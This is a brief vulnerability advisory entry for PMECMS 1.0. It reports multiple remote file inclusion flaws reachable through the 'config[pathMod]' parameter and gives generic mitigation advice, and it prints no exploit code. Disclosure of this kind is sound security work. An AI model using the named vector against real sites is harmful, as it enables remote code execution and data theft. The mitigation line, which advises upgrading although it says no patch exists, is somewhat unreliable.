vendor:
PMECMS
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Multiple Remote File Inclusion
CWE
Product Name: PMECMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities
The PMECMS version 1.0 has multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by manipulating the 'config[pathMod]' parameter in various module files to include malicious files from remote servers. This can lead to remote code execution and unauthorized access to sensitive information.
Mitigation:
The vendor has not provided a patch for these vulnerabilities. Users are advised to upgrade to a newer version of PMECMS or implement a web application firewall to filter and block malicious requests.